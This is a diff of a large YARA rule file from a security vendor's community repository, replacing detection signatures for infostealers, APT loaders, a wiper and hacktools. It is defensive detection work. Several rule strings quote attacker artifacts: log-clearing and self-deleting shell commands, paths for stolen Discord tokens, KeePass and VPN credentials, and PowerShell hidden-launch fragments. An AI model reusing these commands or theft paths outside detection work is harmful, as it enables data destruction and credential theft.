-		reference = "https://blog.talosintelligence.com/2022/04/haskers-gang-zingostealer.html"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/infostealer_win_ginzostealer_str.yar#L1-L20"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "b1c811a13cf0f632ac839b6a6de050fc59ffe3ed0704545feff02e13521ea53f"
+		reference = "https://lamp-ret.club/t/vulturi-cracked-by-tr0uble-and-eshelon_mayskih.193/"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/infostealer_win_vulturi.yar#L1-L35"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "2d442768499ea0d4b6f5ac0d85521d73bb8337a53f1641485b0ce0054e2dc91c"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -236633,27 +237495,40 @@ rule SEKOIA_Infostealer_Win_Ginzostealer_Str : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str0 = "Ginzo.pdb" ascii
-		$str1 = "Ginzo.exe" wide
-		$str2 = "SELECT creation_utc,top_frame_site_key,host_key,name,value,encrypted_value,path,expires_utc,is_secure,is_httponly,last_access_utc,has_expires,is_persistent,priority,samesite,source_scheme,source_port,is_same_party FROM cookies" wide
-		$str3 = "SELECT origin_url,action_url,username_element,username_value,password_element,password_value,submit_element,signon_realm,date_created,blacklisted_by_user,scheme,password_type,times_used,form_data,display_name,icon_url,federation_url,skip_zero_click,generation_upload_status,possible_username_pairs,id,date_last_used,moving_blocked_for,date_password_modified FROM logins" wide
-		$str4 = "SELECT id,originAttributes,name,value,host,path,expiry,lastAccessed,creationTime,isSecure,isHttpOnly,inBrowserElement,sameSite,rawSameSite,schemeMap FROM moz_cookies" wide
+		$vul = "Vulturi_" ascii
+		$str01 = "/C chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A" wide
+		$str02 = "SELECT ExecutablePath, ProcessID FROM Win32_Process" wide
+		$str03 = "Apps\\Gaming\\Minecraft" wide
+		$str04 = "Apps\\Gaming\\Steam\\Apps" wide
+		$str05 = "Messengers\\Facebook\\Contacts.txt" wide
+		$str06 = "Messengers\\Discord\\Tokens.txt" wide
+		$str07 = "Apps\\VPN\\NordVPN\\accounts.txt" wide
+		$str08 = "Apps\\VPN\\DUC\\credentials.txt" wide
+		$str09 = "System\\Screenshots\\Webcam.png" wide
+		$str10 = "System\\Screenshots\\Desktop.png" wide
+		$str11 = "GTA San Andreas User Files\\SAMP\\USERDATA.DAT" wide
+		$str12 = "http://ip-api.com/line?fields=query" wide
+		$str13 = "Wireshark" wide
+		$str14 = "KeePass.config.xml" wide
+		$str15 = "Apps\\TheBat!" wide
+		$str16 = "Vulturi" wide
+		$str17 = "StealerStub" wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 4 of them
+		uint16( 0 ) == 0x5A4D and ( #vul > 50 or 12 of ( $str* ) )
 }
-rule SEKOIA_Apt_Mustangpanda_Decrypt_Payload : FILE
+rule SEKOIA_Apt_Uac0154_Powershell_Infection_Chain_2 : FILE
 {
 	meta:
-		description = "Detects the decryption routine of DAT file"
+		description = "UAC-0154 Infection chain"
 		author = "Sekoia.io"
-		id = "7b954007-0929-454d-8a10-05279a337f1b"
-		date = "2022-12-08"
+		id = "6fe37d52-9bd3-4aa8-83ba-15399bd1b66c"
+		date = "2023-10-02"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_mustangpanda_decrypt_payload.yar#L1-L27"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "dcc32580e351e605d21dc29558764c6fd85f8a9506de8e78f301459a5a2610b7"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_uac0154_powershell_infection_chain_2.yar#L1-L19"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "029d88971030a377b3c93ba4c986668e53b01ee03ba94a0a4ceb54b20b72ff2d"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -236661,35 +237536,28 @@ rule SEKOIA_Apt_Mustangpanda_Decrypt_Payload : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$chunk_1 = {
-        85 ??
-        74 ??
-        8B ??
-        D1 EA
-        A1 ?? ?? ?? ??
-        03 C2
-        A3 ?? ?? ?? ??
-        30 04 29
-        41
-        3B ??
-        72 EC
-        }
+		$ = "files.catbox.moe"
+		$ = "$pse = $pse.Replace"
+		$ = "start -WindowStyle Hidden -FilePath $p"
+		$ = "-bxor $xorMask"
+		$ = "SysctlHost"
 
 	condition:
-		filesize < 8MB and all of them
+		4 of them and filesize < 100KB
 }
-rule SEKOIA_Generic_Sharpshooter_Payload_13 : FILE
+
+rule SEKOIA_Apt_Spikedwine_Wineloader : FILE
 {
 	meta:
-		description = "Detects payload created by SharpShooter"
+		description = "Detects vineloader"
 		author = "Sekoia.io"
-		id = "2d61d7b8-5348-4cc8-9d41-61799b573e3b"
-		date = "2023-02-03"
+		id = "7a599076-cd9d-42c4-a83a-9a991ede19fb"
+		date = "2024-02-29"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/generic_sharpshooter_payload_13.yar#L1-L18"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "fb6b71bf1e89abf872fb3ef02a228f370f0fcc10d5aab70418fe8735283165da"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_spikedwine_wineloader.yar#L3-L26"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "c71d7ef8cb89d8fcd42e3178a729d912d5fe8e9eb396e46d7a0f5176a9398d75"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -236697,26 +237565,28 @@ rule SEKOIA_Generic_Sharpshooter_Payload_13 : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "Private Function decodeHex(hex)"
-		$ = "EL.Text = hex "
-		$ = "serialized_obj = serialized_obj & "
-		$ = "d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class)"
+		$c = { E8 ?? ?? ?? ?? 48 8D 0D
+        ?? ?? ?? ?? 48 8D 05 ??
+        ?? ?? ?? 48 89 05 ?? ??
+        ?? ?? 48 C7 05 ?? ?? ??
+        ?? ?? ?? 00 00 48 C7 05
+        ?? ?? ?? ?? ?? ?? 00 00 }
 
 	condition:
-		all of them and filesize < 2MB
+		pe.is_dll( ) and filesize < 100KB and for any export in pe.export_details : ( $c in ( export.offset..export.offset + 100 ) )
 }
-rule SEKOIA_Apt_Lazarus_Dangerouspassword_Lnk : FILE
+rule SEKOIA_Guloader_Unpacker_Decoded : FILE
 {
 	meta:
-		description = "Detects Lazarus DangerousPassword LNKs"
+		description = "GuLoader Unpacker b64 decoded"
 		author = "Sekoia.io"
-		id = "32533880-7f75-4682-a7ae-9868d0b5174b"
-		date = "2022-07-26"
+		id = "ca3f4fce-b3a1-4672-a2ca-29ea347eb23d"
+		date = "2024-02-07"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_lazarus_dangerouspassword_lnk.yar#L1-L21"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "79731450c4623f614c55d8c08d879579e21fd38c85d2a288724b6e9470de6e29"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/guloader_unpacker_decoded.yar#L1-L18"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "5de4a147b2dea8a144905b7f1786199bfeef3006ac58179409cfd3dcaa116725"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -236724,27 +237594,26 @@ rule SEKOIA_Apt_Lazarus_Dangerouspassword_Lnk : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = {6D 00 73 00 68 00 2A}
-		$s2 = {25 00 70 00 75 00 62 00 6C 00 69 00 63 00 25}
-		$s3 = {44 00 4F 00 20 00 73 00 74 00 61 00 72 00 74}
-		$b1 = {2F 00 63 00 20 00 73 00 74 00 61 00 72 00 74 00 20 00 2F 00 62 00 20 00 6D 00 73 00 68 00 74 00 61}
-		$c1 = {68 00 74 00 74 00 70 00 73 00 3A 00 2F 00 2F 00 62 00 69 00 74 00 2E 00 6C 00 79 00 2F}
+		$jumps = {71 01 9b 71 01 9b}
+		$s1 = "([String]$"
+		$s2 = "For($"
+		$s3 = ",[Parameter(Position = 1)] [Type] $"
 
 	condition:
-		uint32be( 0 ) == 0x4C000000 and filesize > 1KB and filesize < 40MB and ( all of ( $s* ) or $b1 or ( $s1 and $c1 ) )
+		filesize < 500KB and @jumps < 1000 and 2 of ( $s* )
 }
-rule SEKOIA_Tool_Iodine_Strings : FILE
+rule SEKOIA_Apt_Ir_Sugarush_Implant : FILE
 {
 	meta:
-		description = "Detects iodine based on strings"
+		description = "Detects the SUGARUSH implant"
 		author = "Sekoia.io"
-		id = "029766cc-80fb-423d-adc5-8867c438c5d3"
-		date = "2024-02-02"
+		id = "bcf057cc-272c-4cb6-bb76-928788675282"
+		date = "2022-08-23"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/tool_iodine_strings.yar#L1-L20"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "049b5af42d204061bd7e0c0294bb0abea492647dce8ec63fa3f296d1a19cb246"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_ir_sugarush_implant.yar#L1-L21"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "0d249552013c29ce1eb66dca2d93e5cde0a1b0fb80aae55469bec3bda224be91"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -236752,26 +237621,27 @@ rule SEKOIA_Tool_Iodine_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "Sending DNS queries for %s to %s"
-		$ = "No tun devices found, trying utun"
-		$ = "iodine IP over DNS tunneling client"
-		$ = "topdomain is the FQDN that is delegated to the tunnel endpoint."
+		$ = "You are offline at " wide
+		$ = "\\Logs\\ServiceLog_" wide
+		$ = "Service is recall at" wide
+		$ = "add_OutputDataReceived" ascii
+		$ = "get_CurrentDomain" ascii
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 1MB and 3 of them
+		uint16be( 0 ) == 0x4d5a and filesize < 100KB and all of them
 }
-rule SEKOIA_Strongpity_Malware : FILE
+rule SEKOIA_Tool_Masky_Strings : FILE
 {
 	meta:
-		description = "Detects obfuscation used by StrongPity"
+		description = "Detects Masky tool"
 		author = "Sekoia.io"
-		id = "f19a685c-599d-42cf-a5d8-7a2375102f97"
-		date = "2024-02-26"
+		id = "542670ee-9f2e-4148-853d-a3f055bd584c"
+		date = "2022-08-23"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/strongpity_malware.yar#L1-L21"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "14be5eccb4e754d6dad69cda51a924241cc75f5d758bc2d746acfe41e1684b3a"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/tool_masky_strings.yar#L1-L21"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "35dc536879d9464919028ace6b65b225455621035184d7b58468d259ccda62aa"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -236779,98 +237649,80 @@ rule SEKOIA_Strongpity_Malware : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$rand_edi = {E8 ?? ?? ?? ??    8B F8 81 E7 07 00 00 80    79 ?? 4F 83 CF F8 47 83 C7 02}
-		$rand_esi = {E8 ?? ?? ?? ?? 8B F0 81 E6 07 00 00 80 79 ?? 4E 83 CE F8 46 83 C6 02}
-		$rand_eax = {E8 ?? ?? ?? ??    25 07 00 00 80 79 ?? 48 83 C8 F8 40 83 C0 02}
+		$s1 = "caa1aa2e-8a2a-4f98-bc51-b7cf10663fa9" ascii
+		$s2 = "Masky" ascii
+		$s3 = "\\Windows\\Temp\\" wide
+		$s4 = "Length must be non-negative" wide
+		$s5 = "CSP does not contain a private key" wide
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and #rand_edi + #rand_esi + #rand_eax > 20
+		uint16be( 0 ) == 0x4d5a and filesize < 1MB and 4 of them or $s1
 }
-rule SEKOIA_Loader_Win_Operationmagalenha_Vbs
+rule SEKOIA_Loader_Win_Purecrypter : FILE
 {
 	meta:
-		description = "Finds VBS file loading the PeepingTitle backdoor"
+		description = "Detect the PureCrypter loader"
 		author = "Sekoia.io"
-		id = "b1f705d1-de3e-4ce6-9bb7-0e39b6e79add"
-		date = "2023-05-31"
+		id = "500b4d9e-55f8-41d1-ad4f-d587bbeb4507"
+		date = "2022-09-22"
 		modified = "2024-12-19"
-		reference = "https://www.sentinelone.com/labs/operation-magalenha-long-running-campaign-pursues-portuguese-credentials-and-pii/"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/loader_win_operationmagalenha_vbs.yar#L1-L39"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "bb1c48ea6a4d9f0bc04df558837f2d448b38eac920cb4030e01b915a4e442708"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/loader_win_purecrypter.yar#L1-L16"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "5d0d733a4f8447d2d51656a20640fc9482581e19ba1d53fed7d98e85bb748763"
 		score = 75
-		quality = 78
-		tags = ""
+		quality = 55
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "'Skip to content" ascii
-		$str02 = "'Search" ascii
-		$str03 = "'Sign in" ascii
-		$str04 = "'Sign up" ascii
-		$str05 = "'Code" ascii
-		$str06 = "'Terms" ascii
-		$str07 = "'Privacy" ascii
-		$str08 = "'Security" ascii
-		$str09 = "'Status" ascii
-		$str10 = "'Docs" ascii
-		$str11 = "'Contact GitHub" ascii
-		$str12 = "'Pricing" ascii
-		$str13 = "'API" ascii
-		$str14 = "'Training" ascii
-		$str15 = "'Blog" ascii
-		$str16 = "'About" ascii
-		$vbs01 = "WScript.Sleep" ascii nocase
-		$vbs02 = "Set obj" ascii nocase
-		$vbs03 = "Dim obj" ascii nocase
-		$vbs04 = "https://tinyurl.com" ascii nocase
-		$vbs05 = "C:\\Users\\Public" ascii nocase
-		$vbs06 = "CreateObject(\"WScript.Shell\")" ascii nocase
-		$vbs07 = ".SaveToFile" ascii nocase
+		$hex01 = /http:\/\/[^\s]{5,90}_[A-Z][a-z]{7}\.(bmp|jpg|png)/ wide
+		$hex02 = "WrapNonExceptionThrows" ascii
 
 	condition:
-		10 of ( $str* ) and 5 of ( $vbs* )
+		uint16( 0 ) == 0x5A4D and ( $hex02 in ( @hex01 .. @hex01 + 1000 ) or $hex01 in ( @hex02 .. @hex02 + 1000 ) )
 }
-
-rule SEKOIA_Wiper_Win_Ruransom : FILE
+rule SEKOIA_Downloader_Mac_Rustbucket_Swiftloader
 {
 	meta:
-		description = "Detect the RURansom malware"
+		description = "Detect the file com.EdoneViewer in the new version of RustBucker 2023-10"
 		author = "Sekoia.io"
-		id = "7bf3694b-c689-482f-88cd-b1f3b86bbc36"
-		date = "2022-11-21"
+		id = "bdbc95db-5d58-4c96-91f9-34b653e67f50"
+		date = "2023-12-05"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/wiper_win_ruransom.yar#L4-L26"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "e16cfe7a273bfa01e2ae56174e6ea10a84d42542a62dda5e7b095a0c30082a31"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/downloader_mac_rustbucket_swiftloader.yar#L1-L19"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "acb5b88f8af53cd3d83de0fd6c3049ce017f038dc7c8b31f70e65e60bf713dfb"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
+		hash1 = "7c5bf60787bfd076c8806eaa4f1185f5b9fda69008376624ab3d17f207eb16a4"
+		hash2 = "bc90adde92bd47b4de7d384e5b20c1a1791d603629bd0fcba4b550fb35e93216"
+		hash3 = "c9a7b42c7b29ca948160f95f017e9e9ae781f3b981ecf6edbac943e52c63ffc8"
 
 	strings:
-		$ = "RURansom"
-		$ = "AesCrypter"
-		$ = "RURansom" wide
+		$ = "/Users/ghost/Desktop/EdoneViewer/EdoneViewer/"
+		$ = "EdoneViewerApp.swift"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them or for any i in ( 0 .. pe.number_of_resources -1 ) : ( hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "e4b6b5b2b293d497ddf373ca9f7e97458328703d2769f451890ac48771c85070" )
+		1 of them
 }
-rule SEKOIA_Hacktool_Win_Powertool : FILE
+rule SEKOIA_Apt_Gamaredon_Htmlsmuggling_Attachment_Stage2 : FILE
 {
 	meta:
-		description = "Detect PowerTool based on strings"
+		description = "Detects Gamaredon HTMLSmuggling attachment"
 		author = "Sekoia.io"
-		id = "ab8355b8-322d-41a4-82f0-43896c96b9bc"
-		date = "2022-09-09"
+		id = "e82335ea-48d5-409c-a270-cfd5a2197c44"
+		date = "2023-01-20"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/hacktool_win_powertool.yar#L1-L21"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "aeccba821e528ca03abc8b50362d450ba2c12ab443454faf5b2809aecd163648"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_gamaredon_htmlsmuggling_attachment_stage2.yar#L1-L19"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "42e637f628db6719342ae104c6c89bb80609c5f3f5c2586daccb31f7d688a2a1"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -236878,29 +237730,27 @@ rule SEKOIA_Hacktool_Win_Powertool : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str0 = "C:\\dev\\pt64_en\\Release\\PowerTool.pdb" ascii
-		$str1 = "Chage language nedd to restart PowerTool" ascii
-		$str2 = "(http://twitter.com/ithurricanept && https://www.linkedin.com/in/powertool)" wide
-		$str3 = "Infected=Before Fix, whether to back up the drive files will be fixed?" wide
-		$str4 = "Infected?-Are you sure to Fix the Infected Driver File?" wide
-		$str5 = "shellex\\ContextMenuHandlers\\PowerTool" wide
-		$str6 = "[PowerTool] name=%s, size=%d, %d" ascii
+		$ = ") == -1) die();" ascii
+		$ = "'data:application/x-rar-compressed;base64, ' +" ascii
+		$ = ".appendChild(img);" ascii
+		$ = "['Win32', 'Win64', 'Windows', 'WinCE'].indexOf(" ascii
+		$ = " = navigator[\"platform\"];" ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and any of them
+		4 of them and filesize < 1MB
 }
-rule SEKOIA_Downloader_Mac_Smooth_Operator : FILE
+rule SEKOIA_Apt_Gamaredon_Lnks_Farl139_Hostname : FILE
 {
 	meta:
-		description = "Detect the Smooth_Operator malware"
+		description = "Detects some hostname used in Gamaredon LNKs"
 		author = "Sekoia.io"
-		id = "c132b3f0-f536-4a66-bcf8-2a95c258c414"
-		date = "2023-07-04"
+		id = "f8bb2e6b-e544-46b0-b61b-048fe84e1100"
+		date = "2023-01-20"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/downloader_mac_smooth_operator.yar#L1-L16"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "031f766d6ab7d94ed7ba4324d4bdfa3fbc11986fba35487a88a1ee3aba090c82"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_gamaredon_lnks_farl139_hostname.yar#L1-L17"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "8be31a4fed363f0e2791efb96a229f6cdec5bfaeaf3e9cd880f8d25c9ae0435e"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -236908,25 +237758,23 @@ rule SEKOIA_Downloader_Mac_Smooth_Operator : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "%s/.main_storage"
-		$ = "%s/UpdateAgent"
+		$ = "desktop-farl139"
 
 	condition:
-		uint32be( 0 ) == 0xcafebabe and all of them
+		uint32be( 0 ) == 0x4c000000 and all of them and filesize < 10KB
 }
-rule SEKOIA_Apt_Apt29_Wineloader_Malicious_Hta
+rule SEKOIA_Apt_Reaper_2Fa_Phishing_Webpage
 {
 	meta:
-		description = "Detects malicious HTA used by APT29 to drop Wineloader"
+		description = "Detects Reaper 2FA phishing webpage"
 		author = "Sekoia.io"
-		id = "5a17d854-0564-4830-a0e5-7867b99716c2"
-		date = "2024-03-25"
+		id = "348ca2ad-c8f9-4aed-8a27-95caa3a34f4b"
+		date = "2023-03-09"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_apt29_wineloader_malicious_hta.yar#L1-L18"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "efafcd00b9157b4146506bd381326f39"
-		logic_hash = "0cc4692e5ff3f258c287f28030147f725d6a534c4f2f7a2a4ff49a305b7fd13d"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_reaper_2fa_phishing_webpage.yar#L1-L23"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "3f0ae0b35ea181b4712feeb34e866519921917179297148982e5298df9f133a9"
 		score = 75
 		quality = 80
 		tags = ""
@@ -236934,25 +237782,31 @@ rule SEKOIA_Apt_Apt29_Wineloader_Malicious_Hta
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "<HTA:APPLICATION ID="
-		$ = "var _0x"
-		$ = "Date['\\x6e\\x6f\\x77']"
+		$ = "setTimeout(checkUpload,"
+		$ = "commChannel.addListener("
+		$ = "else if(commType =="
+		$ = "?dir=DOWN&method=READ&id="
+		$ = "Content : base64_encode(upload_data)"
+		$ = "$.post(upHttpRelayer"
+		$ = "var ablyUpData = {"
+		$ = "initComm();"
+		$ = "function Next(arg) {"
 
 	condition:
-		all of them
+		3 of them
 }
-rule SEKOIA_Apt_Sandworm_Notpetya_Strings : FILE
+rule SEKOIA_Tool_Rsockstun_Strings : FILE
 {
 	meta:
-		description = "Detects NotPetya worm"
+		description = "Detects Rsockstun based on strings"
 		author = "Sekoia.io"
-		id = "c6021638-1b59-4d20-a29d-95cabf256a28"
-		date = "2022-04-15"
+		id = "94d8cb39-3421-441c-8404-62a591b86912"
+		date = "2023-12-22"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_sandworm_notpetya_strings.yar#L1-L21"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "5600071de4b4022a71c48fbcd4b5e47ff6dfa291cc5eac65720bbf763068a6e3"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/tool_rsockstun_strings.yar#L1-L20"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "8faf1004ec56728f1e451734ed651e8f77a49faf7f232df82e0b4950a9f1d198"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -236960,28 +237814,26 @@ rule SEKOIA_Apt_Sandworm_Notpetya_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "wevtutil cl Security &" wide
-		$ = "wevtutil cl System &" wide
-		$ = "u%s \\%s -accepteula -s" wide
-		$ = "\\\\%ws\\admin$\\%ws" wide
-		$ = "\\\\%s\\admin$" wide
-		$ = "C:\\Windows\\System32\\rundll32.exe \"C:\\Windows\\%s\",#1" wide
+		$ = "main.connectviaproxy"
+		$ = "main.connectForSocks"
+		$ = "main.listenForClients"
+		$ = "main.listenForSocks"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and 3 of them
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 10MB and all of them
 }
-rule SEKOIA_Malware_Venom_Agent_Strings : FILE
+rule SEKOIA_Tool_Yasso_Strings : FILE
 {
 	meta:
-		description = "Detects Venom agent strings"
+		description = "Detects Yasso based on strings"
 		author = "Sekoia.io"
-		id = "87633510-8b39-4eb1-b95b-4ebff21f3bba"
-		date = "2022-08-29"
+		id = "31ec7510-6770-4fde-b835-e8b12f8f2b30"
+		date = "2023-06-21"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/malware_venom_agent_strings.yar#L1-L31"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "66dd1cb7bd66fcf78c8eaad8aaab7cfd624b898b7b479e571bacf5c4e48edac9"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/tool_yasso_strings.yar#L1-L21"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "1d715b0962ba9ecbe11649ea85870a8f884f6dd7eda27b1f8eff0d7f5de8c765"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -236989,44 +237841,27 @@ rule SEKOIA_Malware_Venom_Agent_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "dispather.handleDownloadCmd"
-		$ = "dispather.handleUploadCmd"
-		$ = "dispather.handleShellCmd"
-		$ = "dispather.handleSocks5Cmd"
-		$ = "dispather.handleLForwardCmd"
-		$ = "dispather.localLForwardServer"
-		$ = "dispather.handleRForwardCmd"
-		$ = "dispather.AgentHandShake"
-		$ = "dispather.AgentParseTarget"
-		$ = "dispather.PipeWhenClose"
-		$ = "dispather.handleSshConnectCmd"
